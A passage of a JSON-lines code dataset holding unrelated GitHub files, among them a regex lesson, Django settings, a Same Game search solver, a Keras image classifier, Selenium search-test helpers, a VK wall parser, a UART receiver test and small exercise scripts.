children, all of whom are currently adults.\r\nmaria, now his wife, still makes that coffee with cheese bread in the afternoons of\r\nSunday. Also right! Being the good miner she is, she never forgets her famous\r\ncheese bread.\r\nI can't get enough of listening to Maria:\r\n\"Joooooooooãooooooo, the coffee is ready here. Comeeess\"!\r\n'''\r\n\r\nprint(re.findall(r'jo+ão', text, flags=re.IGNORECASE)) # Escolhendo João e incluindo o utilizando + e ignorando as\r\n# letras tanto maiúscula como minúscula\r\n\r\nprint(re.sub(r'jo+ão', 'Felicty', text, flags=re.IGNORECASE)) # Substituindo João e trocando pelo nome de Felicty\r\n# incluindo o utilizando + e ignorando as letras tanto maiúscula como minúscula\r\n\r\nprint(re.sub(r'jo*ão*', 'Felicty', text, flags=re.IGNORECASE)) # Substituindo João e trocando pelo nome de Felicty\r\n# incluindo o utilizando + e ignorando as letras tanto maiúscula como minúscula\r\n\r\nprint(re.sub(r'jo?ão*', 'Felicty', text, flags=re.I)) # Substituindo João e trocando pelo nome de Felicty\r\n# incluindo o utilizando + e ignorando as letras tanto maiúscula como minúscula\r\n\r\nprint(re.findall(r'jo{1,}ão{1,}', text, flags=re.I)) # Encontrando João e incluindo o utilizando + e ignorando\r\n# as letras tanto maiúscula como minúscula\r\n\r\nprint(re.findall(r'Come{3}e{1,2}', text, flags=re.I)) # Encontrando a palavra vem no texto e ignorando as letras\r\n# tanto maiúscula como minúscula\r\n\r\nprint(re.findall(r'j[o]+ão+', text, flags=re.I)) # Encontrando a palavra joão no texto e ignorando as letras\r\n# tanto maiúscula como minúscula\r\n\r\n\r\n# Declarando uma variável\r\ntext_02 = 'John loves to be loved'\r\n\r\n# Apresentando na tela do usuário\r\nprint(re.findall(r'lov[ed]{0,2}', text_02, flags=re.I)) # Encontrando a palavra love e loved no texto e ignorando\r\n# as letras anto maiúscula como minúscula.\r\n","repo_name":"romulovieira777/Expressoes_Regulares_em_Python","sub_path":"aula_03.py","file_name":"aula_03.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43068676567","text":"import sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nfrom .base import *\n\nsentry_sdk.init(\n dsn=\"https://dd867937f2e142fa9a39d1f0cedac357@sentry.io/1463061\",\n integrations=[DjangoIntegration()]\n)\n\nDEBUG = False\n\nALLOWED_HOSTS = [\n os.environ.get('DOMAIN', 'example.com')\n]\n\nPROJECT_ROOT = os.path.dirname(os.path.dirname(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\n\n# FILE SYSTEM\n\nNGINX_ROUTE = '/etc/nginx'\nGIT_PROJECTS_ROUTE = os.environ.get('GIT_PROJECTS_ROUTE', '/path/to/git/apps')\n\n# CORS\n\nCORS_ORIGIN_WHITELIST = (\n os.environ.get('FRONT_APP_DOMAIN', 'example.com')\n)\n\nCSRF_TRUSTED_ORIGINS = (\n os.environ.get('FRONT_APP_DOMAIN', 'example.com')\n)\n","repo_name":"orchestrapi/orchestrapi","sub_path":"core/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33519515506","text":"#Grupo 3: 80832 Margarida Ferreira, 81805 Duarte David\n\nfrom search import *\n\n# TAI color\n# sem cor = 0\n# com cor > 0\ndef get_no_color():\n return 0\ndef no_color (c):\n return c==0\ndef color (c):\n return c > 0\n\n# TAI pos\n# Tuplo (l, c)\ndef make_pos (l, c):\n return (l, c)\ndef pos_l (pos):\n return pos[0]\ndef pos_c (pos):\n return pos[1]\n\ndef print_board (board):\n for line in board:\n for cell in line:\n print(cell, end =' ')\n print()\n\ndef board_remove_group(board, group):\n # 1. Fazer uma copia do tabuleiro\n # 2. Colocar a 0 todas as posicoes do do grupo\n # 3. Compacatacao vertical\n # 4. Compactacao horizontal\n l = []\n i = 0\n j = 0\n for line in board:\n l.append([])\n for cell in line:\n l[i].append(cell)\n j+=1\n i+=1\n \n #compacts each column vertically\n #and eliminates a column if empty (compacts horizontally)\n missing_columns = 0\n j = 0\n while j < len(board[0]):\n advance = 0\n \n if(j+missing_columns <= len(board[0])-1): \n for i in reversed(range(0, len(board))):\n while make_pos(i-advance,j+missing_columns) in group:\n advance+=1\n \n if (advance > 0 or missing_columns > 0) and (i - advance) >= 0:\n l[i][j] = l[i-advance][j+missing_columns]\n elif (i-advance) < 0:\n l[i][j] = 0 \n \n #empty column case\n if l[len(board)-1][j] == 0:\n missing_columns += 1\n j-=1\n else:\n for i in range(0, len(board)):\n l[i][j] = 0\n \n j+=1\n \n return l\n\ndef board_find_groups(board):\n groups = []\n found = []\n i = 0\n for line in board:\n found.append([])\n for cell in line:\n found[i].append(0)\n \n i+=1\n \n for i in range(0, len(board)):\n for j in range(0, len(board[0])):\n \n if color(board[i][j]):\n group = board_get_group(make_pos(i,j), board, found)\n if (not group is None):\n groups.append(group)\n \n \n return groups\n\ndef board_get_group(pos, board, found):\n i = pos_l(pos)\n j = pos_c(pos)\n group = []\n if found[i][j] > 0:\n return None\n else:\n found[i][j] = 1\n group.append(pos)\n \n if i0:\n if board[i][j] == board[i-1][j]:\n g = board_get_group(make_pos(i-1,j), board, found)\n if not g is None:\n group+=g\n \n if j0:\n if board[i][j] == board[i][j-1]:\n g = board_get_group(make_pos(i,j-1), board, found)\n if not g is None:\n group+=g\n \n \n return group\n\ndef board_get_num_groups(board):\n count = 0;\n for line in board:\n for cell in line:\n if not no_color(cell):\n count+=1\n \n return count\n\ndef board_get_num_colors(board):\n colors = set()\n for line in board:\n for cell in line:\n if not no_color(cell):\n set.add(cell)\n return len(colors)\n\n\n\nclass sg_state:\n state_id = 0\n def __init__(self, board):\n self.board = board\n self.id = sg_state.state_id\n sg_state.state_id += 1\n \n def __lt__(self, other):\n return self.id < other.id\n \nclass same_game(Problem):\n \n def __init__(self, board):\n self.initial = sg_state(board);\n \n def actions(self, state):\n ret_actions = board_find_groups(state.board)\n return [item for item in ret_actions if len(item)>1]\n \n def result(self, state, action):\n return sg_state(board_remove_group(state.board, action))\n \n def goal_test(self, state):\n # Board is empty if the lower left slot is empty\n pos = make_pos(len(state.board)-1, 0)\n return no_color(state.board[pos_l(pos)][pos_c(pos)])\n \n def h(self, node):\n return len(board_find_groups(node.state.board))\n","repo_name":"Marghrid/Artificial-Intelligence","sub_path":"proj1/sg_g3.py","file_name":"sg_g3.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74049346384","text":"import os\nimport tensorflow as tf\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\n\nbase_dir = '/tmp/horse-or-human-update'\ntrain_dir = os.path.join(base_dir, 'train')\nvalidation_dir = os.path.join(base_dir, 'validation')\n\ntrain_horse_dir = os.path.join(train_dir, 'horses')\ntrain_human_dir = os.path.join(train_dir, 'humans')\nvalidation_horse_dir = os.path.join(validation_dir, 'horses')\nvalidation_human_dir = os.path.join(validation_dir, 'humans')\n\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(16, (3,3), activation=tf.nn.relu, input_shape=(300,300, 3)),\n tf.keras.layers.MaxPooling2D(2,2),\n tf.keras.layers.Conv2D(32, (3,3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2,2),\n tf.keras.layers.Conv2D(64, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(64, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Conv2D(64, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPooling2D(2, 2),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)\n])\n\n\nmodel.compile(loss='binary_crossentropy', optimizer=tf.optimizers.RMSprop(lr=1e-4), metrics=['accuracy'])\n\ntrain_datagen = ImageDataGenerator(\n rescale=1.0/255,\n rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest'\n)\n\nvalidation_datagen = ImageDataGenerator(\n rescale=1.0/255\n)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_dir,\n target_size=(300,300),\n batch_size=128,\n class_mode='binary'\n)\n\nvalidation_generator = validation_datagen.flow_from_directory(\n validation_dir,\n target_size=(300,300),\n batch_size=32,\n class_mode='binary'\n)\n\n\nresults = model.fit(\n train_generator,\n steps_per_epoch=8,\n epochs=5, # use 100 in Google Colab\n validation_data=validation_generator,\n validation_steps=8,\n verbose=1\n)\n\naccuracy = results.history['accuracy']\nval_accuracy = results.history['val_accuracy']\nloss = results.history['loss']\nval_loss = results.history['val_loss']\n\nepochs = range(len(accuracy))\n\nplt.plot(epochs, accuracy, 'r', label='Training accuracy')\nplt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.figure()\n\nplt.plot(epochs, loss, 'r', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('training and validation loss')\nplt.legend()\n\nplt.show()","repo_name":"finesketch/deep_learning","sub_path":"Coursera - DeepLearning.AI TensorFlow Developer/2. Convolutional Neural Network/Course2-Part4-Lesson4.py","file_name":"Course2-Part4-Lesson4.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71727694865","text":"# -*- coding: utf-8 -*-\nimport math\n\nfrom support import service_log\nfrom tests.MainClass import MainClass\nfrom tests.front_office.not_sorted.classes.class_navigate import HelpNavigateCheckMethods as Navigate\n\n__author__ = 'm.senchuk'\n\n\nclass SearchData(MainClass):\n USER_NAME = \"пользователь\"\n F_MAP = {\n True: False,\n False: True\n }\n\n\nclass SearchMethods(SearchData):\n @staticmethod\n def search_form(driver):\n \"\"\"\n Метод получа��т объекты формы поиска\n :param driver:\n :return: словарь объектов формы поиска\n \"\"\"\n search_form = {\n \"input\": Navigate.element_is_present(driver, Navigate.input_main.SEARCH),\n \"btn\": Navigate.element_is_present(driver, Navigate.click_main.SEARCH_BTN)\n }\n service_log.put('Получены объекты формы поиска')\n return search_form\n\n @staticmethod\n def left_menu(driver):\n \"\"\"\n Метод получает объекты меню слева на странице поиска и количество найденных товаров и пользователей\n :param driver:\n :return: словарь объектов формы меню\n \"\"\"\n active_url = driver.current_url.encode('utf-8')\n type_search = active_url[active_url.rfind('/') + 1:active_url.rfind('?')]\n menu = {\n \"title\": Navigate.element_is_present(driver, Navigate.check_search.TITLE_SEARCH),\n \"goods\": Navigate.element_is_present(driver, Navigate.click_search.GOODS_MENU[type_search]),\n \"users\": Navigate.element_is_present(driver, Navigate.click_search.USERS_MENU[type_search]),\n }\n menu.update({\"count_goods\": menu[\"goods\"].text.encode('utf-8').strip(\"Товары \")})\n menu.update({\"count_users\": menu[\"users\"].text.encode('utf-8').strip(\"Пользователи \")})\n service_log.put(\"Получены объекты левого меню на странице поиска\")\n return menu\n\n @staticmethod\n def good_card_short(driver, good):\n \"\"\"\n Метод получает объект короткая карточка товара по заданным данным\n :param good: данные товара\n :return:\n \"\"\"\n main_picture = good[\"content\"][u'pictures'][u'value'][0].encode('utf-8')\n title = good[\"content\"][u'title'][u'value'].encode('utf-8')\n min_stock = good[\"content\"][u'min_stock'][u'value']\n try:\n price = str(good[\"content\"][u'price'][u'value'][u'significand'])\n if 3 < len(price) < 7:\n price = price[:-3] + \" \" + price[-3:] # здесь в кавычках неразрывные пробелы\n elif len(price) >= 7:\n price = price[:-6] + \" \" + price[-6:-3] + \" \" + price[-3:]\n except Exception:\n price = \"---\"\n g_card = {\n \"card\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_CARD_BY_ID % good[\"ware_id\"]),\n \"picture\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_PICTURE % (good[\"ware_id\"],\n main_picture)),\n \"title\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_TITLE % (good[\"ware_id\"], title)),\n \"price\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_PRICE % (good[\"ware_id\"], price)),\n \"min_stock\": Navigate.element_is_present(driver, Navigate.click_search.GOOD_MIN_STOCK % (good[\"ware_id\"],\n min_stock)),\n }\n service_log.put(\"Короткая карточка товара найдена. Id: %s\" % good[\"ware_id\"])\n return g_card\n\n @staticmethod\n def none_found(driver, test_string):\n \"\"\"\n Метод получает форму пользователей и товаров не найдено\n :param driver:\n :param test_string:\n \"\"\"\n form = {\n 'title': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_ALL_EMPTY % test_string),\n 'description': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_EMPTY_DESC),\n 'btn_catalog': Navigate.element_is_present(driver, Navigate.click_search.BTN_CATALOG)\n }\n return form\n\n @staticmethod\n def found_only_users(driver, test_string):\n \"\"\"\n Метод получает форму товаров не найдено но найдены пользователи\n :param driver:\n :param test_string:\n :return:\n \"\"\"\n form = {\n 'title': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_GOOD_EMPTY % test_string),\n 'description': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_GOOD_EMPTY_DESC),\n 'btn_to_users': Navigate.element_is_present(driver, Navigate.click_search.BTN_TO_USERS % test_string)\n }\n return form\n\n @staticmethod\n def found_only_goods(driver, test_string):\n \"\"\"\n Метод получает форму пользов��телей не найдено но найдены товары\n :param driver:\n :param test_string:\n :return:\n \"\"\"\n form = {\n 'title': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_USER_EMPTY % test_string),\n 'description': Navigate.element_is_present(driver, Navigate.check_search.CATALOG_USER_EMPTY_DESC),\n 'btn_to_goods': Navigate.element_is_present(driver, Navigate.click_search.BTN_TO_GOODS % test_string)\n }\n return form\n\n @staticmethod\n def get_good_ids(driver, len_id=32):\n \"\"\"\n Получить идентификаторы товаров со страницы\n :param driver:\n :param len_id: длина идентификатора товара\n :return:\n \"\"\"\n source_page = driver.page_source.encode('utf-8')\n list_source = source_page.split('/goods/')\n list_source = list_source[1:]\n list_ids = [\"'\" + i[:len_id] + \"'\" for i in list_source]\n str_ids = ','.join(list_ids)\n return str_ids\n\n @staticmethod\n def get_user_ids(driver):\n source_page = driver.page_source.encode('utf-8')\n list_source = source_page.split(Navigate.path_search.PATH_FIND_USER)\n list_source = list_source[1:]\n list_ids = [i[:i.find('\"')] for i in list_source]\n str_ids = ','.join(list_ids)\n return str_ids\n\n\nclass SearchCheckMethods(SearchMethods):\n def search_by_user(self, driver, user, count_users, e_msg=''):\n \"\"\"\n Метод проверяет наличие пользователя в результатах поиска с использованием пагинации\n :param driver:\n :param user:\n \"\"\"\n fail = True\n page = 1\n self.assertNotEqual(int(count_users), 0, \"Не найдено пользователей\")\n all_pages = int(math.ceil(int(count_users) / 40.0))\n while all_pages >= 1:\n try:\n Navigate.element_is_present(driver, Navigate.click_search.LINK_SELLER_AVATAR % user[\"id\"], wait=2)\n Navigate.element_is_present(driver, Navigate.click_search.SELLER_NAME_WITH_ID % (user['id'],\n user[\"display_name\"])\n )\n fail = False\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def search_by_good(self, driver, good, count_goods, e_msg=''):\n \"\"\"\n Метод проверяет наличие товара в результатах поиска с использованием пагинации\n :param driver:\n :param good:\n \"\"\"\n fail = True\n page = 1\n self.assertNotEqual(int(count_goods), 0, \"Не найдено товаров\")\n all_pages = int(math.ceil(int(count_goods) / 40.0))\n while all_pages >= 1:\n try:\n self.good_card_short(driver, good)\n fail = False\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def search_by_no_user(self, driver, user, count_users, e_msg=''):\n \"\"\"\n Метод проверяет отсутствие пользователя в результатах поиска с использованием пагинации\n :param driver:\n :param user:\n \"\"\"\n fail = False\n page = 1\n all_pages = int(math.ceil(int(count_users) / 40.0))\n while all_pages >= 1:\n try:\n Navigate.element_is_present(driver, Navigate.click_search.LINK_SELLER_AVATAR % user[\"id\"], wait=2)\n Navigate.element_is_present(driver, Navigate.click_search.SELLER_NAME_WITH_ID % (user['id'],\n user[\"display_name\"])\n )\n fail = True\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def search_by_no_good(self, driver, good, count_goods, e_msg=''):\n \"\"\"\n Метод проверяет отсутствие товара в результатах поиска с использованием пагинации\n :param driver:\n :param good:\n \"\"\"\n fail = False\n page = 1\n all_pages = int(math.ceil(int(count_goods) / 40.0))\n while all_pages >= 1:\n try:\n self.good_card_short(driver, good)\n fail = True\n break\n except Exception:\n all_pages -= 1\n if all_pages >= 1:\n page += 1\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % page)\n self.assertFalse(fail, e_msg)\n\n def pagination(self, driver, count, section_xpath, items_in_page=40, e_msg=''):\n \"\"\"\n Проверка пагинации\n :param driver:\n :param count:\n :param section_xpath:\n :param e_msg:\n :return:\n \"\"\"\n current_page = 1\n all_pages = int(math.ceil(int(count) / (items_in_page + 0.0)))\n remaining_pages = all_pages - current_page\n if remaining_pages == 0:\n Navigate.element_is_none(driver, Navigate.click_search.PAG_PAGE % current_page)\n obj_on_page = Navigate.elements_is_present(driver, section_xpath)\n on_page = len(obj_on_page)\n self.assertEqual(count, on_page, e_msg)\n elif remaining_pages >= 1:\n count_on_pages = 0\n while remaining_pages >= 0:\n obj_on_page = Navigate.elements_is_present(driver, section_xpath)\n on_page = len(obj_on_page)\n next_page = current_page + 1\n if remaining_pages != 0:\n self.assertEqual(items_in_page, on_page, e_msg)\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % next_page)\n else:\n self.assertEqual(count-count_on_pages, on_page, e_msg)\n count_on_pages += on_page\n current_page += 1\n remaining_pages -= 1\n self.assertEqual(count, count_on_pages, e_msg)\n else:\n self.assertGreaterEqual(remaining_pages, 0, \"Кол-во оставшихся страниц [%s] отрицательно\" % remaining_pages)\n\n def good_state_pagination(self, driver, count, db_link, goods_on_page=40, e_msg=''):\n \"\"\"\n Проверка что товары только в статусе accepted, belived\n :param driver:\n :param count:\n :param goods_on_page:\n :param e_msg:\n :return:\n \"\"\"\n current_page = 1\n all_pages = int(math.ceil(int(count) / (goods_on_page + 0.0)))\n remaining_pages = all_pages - current_page\n count_on_pages = 0\n obj_s = ''\n while remaining_pages >= 0:\n str_ids = self.get_good_ids(driver)\n self.assertNotEqual(obj_s, str_ids, \"Переход на след. страницу не произошел, товары совпадают\")\n goods = db_link.warehouse.get_wares_by_id_and_moderation_state(str_ids, '1,2')\n next_page = current_page + 1\n if remaining_pages != 0:\n self.assertEqual(goods_on_page, len(goods), e_msg)\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % next_page)\n else:\n self.assertEqual(count-count_on_pages, len(goods), e_msg)\n count_on_pages += len(goods)\n obj_s = str_ids\n current_page += 1\n remaining_pages -= 1\n self.assertEqual(count, count_on_pages, e_msg)\n\n def user_state_pagination(self, driver, count, db_link, users_on_page=40, e_msg=''):\n \"\"\"\n Проверка что пользователи только активные продавцы\n :param driver:\n :param count:\n :param goods_on_page:\n :param e_msg:\n :return:\n \"\"\"\n current_page = 1\n all_pages = int(math.ceil(int(count) / (users_on_page + 0.0)))\n remaining_pages = all_pages - current_page\n count_on_pages = 0\n obj_s = ''\n while remaining_pages >= 0:\n str_ids = self.get_user_ids(driver)\n self.assertNotEqual(obj_s, str_ids, \"Переход на след. страницу не произошел, пользователи совпадают\")\n users = db_link.accounting.get_users_by_id_and_permissions(str_ids, '2,6', '3,4,7,8')\n next_page = current_page + 1\n if remaining_pages != 0:\n self.assertEqual(users_on_page, len(users), e_msg)\n Navigate.element_click(driver, Navigate.click_search.PAG_PAGE % next_page)\n else:\n self.assertEqual(count-count_on_pages, len(users), e_msg)\n count_on_pages += len(users)\n obj_s = str_ids\n current_page += 1\n remaining_pages -= 1\n self.assertEqual(count, count_on_pages, e_msg)\n\n def user_card_in_search(self, driver, user):\n \"\"\"\n Метод проверяет карточку пользователя на странице поиска\n :param driver:\n :param user:\n \"\"\"\n pass\n","repo_name":"Maksim1988/test","sub_path":"tests/front_office/search/classes/class_search.py","file_name":"class_search.py","file_ext":"py","file_size_in_byte":15597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5342004849","text":"rules = {}\nrules_p = {}\nn = 0\nfor line in open('input.txt'):\n n += 1\n ix = line.strip().index('contain')\n parent = line[0:ix].strip().replace('bags', '').strip()\n children = line[ix+len('contain'):].strip()\n children = children.split(',')\n children = [c.replace('bags', '').replace('bag', '').replace('.', '').replace('no', '0').strip() for c in children]\n children = [(int(c.split(' ')[0]), ' '.join(c.split(' ')[1:])) for c in children]\n if parent in rules:\n print('parent already in rules')\n print(rules[parent])\n rules[parent] = children\n for c in children:\n if c[0] != 0:\n rules_p.setdefault(c[1], [])\n rules_p[c[1]].append(parent)\n\n# Task one -----------------------\nmy_bag = 'shiny gold'\nres = []\ndef find_col(col):\n global res\n if col in rules_p:\n for col in rules_p[col]:\n find_col(col)\n res.append(col)\n \nfind_col(my_bag)\ncolors = set(res)\nprint('Nb colors : ', len(colors))\n\n# Task tow ----------------------------\ncounts = 0\ndef count_col(col):\n global counts\n if col in rules:\n c = 0\n for n, new_col in rules[col]:\n c += n + n*count_col(new_col)\n return c\n return 0\n\ncounts = count_col(my_bag)\nprint('Nb : ', counts)\n\n\n","repo_name":"sebastien-lemieux/advent","sub_path":"2020/day07/gb_day07.py","file_name":"gb_day07.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38399412161","text":"import csv\nimport time\nimport requests\n\ndef take_x_posts(x):\n\t'''Parses x posts from the VK group wall.'''\n\ttoken = 'dGFrZSB5b3VyIGhhbmRzIG9mZg=='\n\tversion = 5.131\n\tdomain = 'domain' # vk.com/domain\n\tcount = 100\n\toffset = 0\n\tall_posts = []\n\twhile offset < count:\n\t\tresponse = requests.get('https://api.vk.com/method/wall.get',\n\t\t\t\t\t\t\t\tparams={\n\t\t\t\t\t\t\t\t\t'access_token': token,\n\t\t\t\t\t\t\t\t\t'v': version,\n\t\t\t\t\t\t\t\t\t'domain': domain,\n\t\t\t\t\t\t\t\t\t'count': count,\n\t\t\t\t\t\t\t\t\t'offset': offset\n\t\t\t\t\t\t\t\t})\n\n\t\tdata = response.json()['response']['items']\n\t\toffset += 101\n\t\tall_posts.extend(data)\n\t\ttime.sleep(30)\n\treturn all_posts\n\nall_posts = take_x_posts(200)\n\ndef file_writer(all_posts):\n\twith open('eden_parsing.csv', 'w') as file:\n\t\ta_pen = csv.writer(file)\n\t\ta_pen.writerow(('~~~TEST~~~'))\n\t\tfor post in all_posts:\n\t\t\ta_pen.writerow((post['text']))\n","repo_name":"samaellovecraft/a-lil-bit-of-everything","sub_path":"python/vk-wall-parsing.py","file_name":"vk-wall-parsing.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5397946093","text":"budget = float(input())\nplace_scene = input()\nseason = input()\nnumber_days = int(input())\nday_shooting = 0\nif place_scene == \"Dubai\":\n if season == \"Winter\":\n day_shooting = 45000\n elif season == \"Summer\":\n day_shooting = 40000\nif place_scene == \"Sofia\":\n if season == \"Winter\":\n day_shooting = 17000\n elif season == \"Summer\":\n day_shooting = 12500\nif place_scene == \"London\":\n if season == \"Winter\":\n day_shooting = 24000\n elif season == \"Summer\":\n day_shooting = 20250\nfinal_sum = number_days * day_shooting\nif place_scene == \"Dubai\":\n final_sum *= 0.7\nelif place_scene == \"Sofia\":\n final_sum *= 1.25\ndiff = abs(budget - final_sum)\nif budget >= final_sum:\n print(f\"The budget for the movie is enough! We have {diff:.2f} leva left!\")\nelse:\n print(f\"The director needs {diff:.2f} leva more!\")\n","repo_name":"PetyoGD/MyFirstProject","sub_path":"exam_preparation/movie_desination.py","file_name":"movie_desination.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5996347350","text":"# Ask for enter the number from the use \nNumber = int(input(\"Enter the Number:\"))\n\n# Initiate value to null \nrev = 0\n\nwhile(Number>0):\n\n # Logic \n rem = Number%10\n rev = (rev * 10)+ rem\n Number = Number//10\n\n# Display the result \nprint(\"The Reverse Number is :{}\".format(rev))\n\n\n\n# for example\n# Reminder = number %10\n# Reminder = 12345%10 = 5\n# Reverse = Reverse *10 + Reminder Initial value of revs_number is null\n# Reverse = 0 * 10 + 5 = 0 + 5 = 5\n# Number = Number //10\n# Number = 1234 //10 = 1234 // Now loop will iterate on this number. ","repo_name":"malinisaran/python","sub_path":"reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17410232545","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom hwt.hdl.constants import Time\nfrom hwt.simulator.simTestCase import SimTestCase\nfrom hwt.simulator.utils import valToInt\nfrom hwtLib.peripheral.uart.rx import UartRx\nfrom hwtSimApi.constants import CLK_PERIOD\nfrom pyMathBitPrecise.bit_utils import get_bit\n\n\nclass UartRxBasicTC(SimTestCase):\n\n @classmethod\n def setUpClass(cls):\n u = cls.u = UartRx()\n u.OVERSAMPLING = cls.OVERSAMPLING = 16\n u.FREQ = cls.FREQ = 115200 * cls.OVERSAMPLING\n u.BAUD = cls.BAUD = 115200\n cls.compileSim(u)\n\n def getStr(self):\n s = \"\"\n for d in self.u.dataOut._ag.data:\n ch = valToInt(d)\n s += chr(ch)\n\n return s\n\n def sendStr(self, string):\n START_BIT = 0\n STOP_BIT = 1\n\n rx = self.u.rxd._ag.data\n os = self.FREQ // self.BAUD\n for ch in string:\n rx.extend([START_BIT for _ in range(os)])\n for i in range(8):\n d = get_bit(ord(ch), i)\n rx.extend([d for _ in range(os)])\n rx.extend([STOP_BIT for _ in range(os)])\n\n def test_nop(self):\n self.u.rxd._ag.data.append(1)\n self.runSim(200 * Time.ns,)\n self.assertEqual(self.getStr(), \"\")\n\n def test_simple(self):\n t = \"simple\"\n self.sendStr(t)\n self.runSim(self.OVERSAMPLING *\n (self.FREQ // self.BAUD) * (len(t) + 5) * CLK_PERIOD)\n self.assertEqual(self.getStr(), t)\n\n\nclass UartRxTC(UartRxBasicTC):\n\n @classmethod\n def setUpClass(cls):\n cls.OVERSAMPLING = 16\n cls.FREQ = 115200 * cls.OVERSAMPLING * 4\n cls.BAUD = 115200\n\n u = cls.u = UartRx()\n u.BAUD = cls.BAUD\n u.FREQ = cls.FREQ\n u.OVERSAMPLING = cls.OVERSAMPLING\n cls.compileSim(u)\n\n\nif __name__ == \"__main__\":\n import unittest\n _ALL_TCs = [UartRxBasicTC, UartRxTC]\n testLoader = unittest.TestLoader()\n loadedTcs = [testLoader.loadTestsFromTestCase(tc) for tc in _ALL_TCs]\n suite = unittest.TestSuite(loadedTcs)\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/peripheral/uart/rx_test.py","file_name":"rx_test.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"9004213891","text":"from typing import List, Dict\n\n\nclass NCR:\n factorials: List[int]\n mod: int\n mod_inverse_cache: Dict = {}\n\n def __init__(self, max, mod):\n self.max_factorial = max\n self.mod = mod\n self.factorials = [1] * (max + 1)\n temp = 1\n for i in range(1, max + 1):\n temp = (temp * i) % mod\n self.factorials[i] = temp\n\n def power(self, a, b):\n x = 1\n y = a\n while b > 0:\n if (b % 2) > 0:\n x = (x * y) % self.mod\n y = (y * y) % self.mod\n b = (b // 2)\n return x % self.mod\n\n def mod_inverse(self, a):\n if a in self.mod_inverse_cache:\n return self.mod_inverse_cache[a]\n self.mod_inverse_cache[a] = self.power(a, self.mod - 2)\n return self.mod_inverse_cache[a]\n\n def ncr(self, n, r):\n return (self.factorials[n] *\n (self.mod_inverse((self.factorials[r] * self.factorials[n - r]) % self.mod)) % self.mod) % self.mod\n\n\ntests = int(input())\n\nwhile tests > 0:\n myncr = NCR(100000, 1000000007)\n tests -= 1\n n = int(input())\n a = input()\n b = input()\n n1 = 0\n n2 = 0\n for c in a:\n if c == '1':\n n1 += 1\n\n for c in b:\n if c == '1':\n n2 += 1\n\n if n2 > n1:\n temp_n = n1\n n1 = n2\n n2 = temp_n\n\n min = n1 - n2\n\n if n1 + n2 > n:\n max = (2 * n) - (n1 + n2)\n else:\n max = n1 + n2\n\n ans = 0\n i = min\n while i <= max:\n ans = (ans + myncr.ncr(n, i)) % 1000000007\n i += 2\n\n 